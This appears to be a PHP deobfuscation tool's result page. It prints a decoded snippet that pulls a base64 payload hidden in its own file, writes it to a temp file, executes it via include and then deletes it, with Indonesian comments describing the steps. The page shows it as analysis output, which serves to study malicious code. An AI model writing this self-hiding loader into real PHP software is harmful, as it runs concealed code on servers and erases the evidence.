Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

preg_match('/'.base64_decode('ZGl1bmRkdWgoLis/KWRpZWtzc2VrdXNp').'/si',file_get_contents/*..

Decoded Output download

<?  preg_match('/'.base64_decode('ZGl1bmRkdWgoLis/KWRpZWtzc2VrdXNp').'/si',file_get_contents/*******/(__FILE__),$o0); 
$o = tempnam(sys_get_temp_dir(), '____'); 
file_put_contents($o, base64_decode($o0[1])); 
// Include file yang telah diunduh dari URL 
include $o; 
// Hapus file sementara setelah dieksekusi 
unlink($o); 
 ?>

Did this file decode correctly?

Original Code

preg_match('/'.base64_decode('ZGl1bmRkdWgoLis/KWRpZWtzc2VrdXNp').'/si',file_get_contents/*******/(__FILE__),$o0);
$o = tempnam(sys_get_temp_dir(), '____');
file_put_contents($o, base64_decode($o0[1]));
// Include file yang telah diunduh dari URL
include $o;
// Hapus file sementara setelah dieksekusi
unlink($o);

Function Calls

preg_match 1
base64_decode 1
sys_get_temp_dir 1
file_get_contents 1

Variables

None

Stats

MD5 e479ddbe5172b015aa38a792da70e804
Eval Count 0
Decode Time 53 ms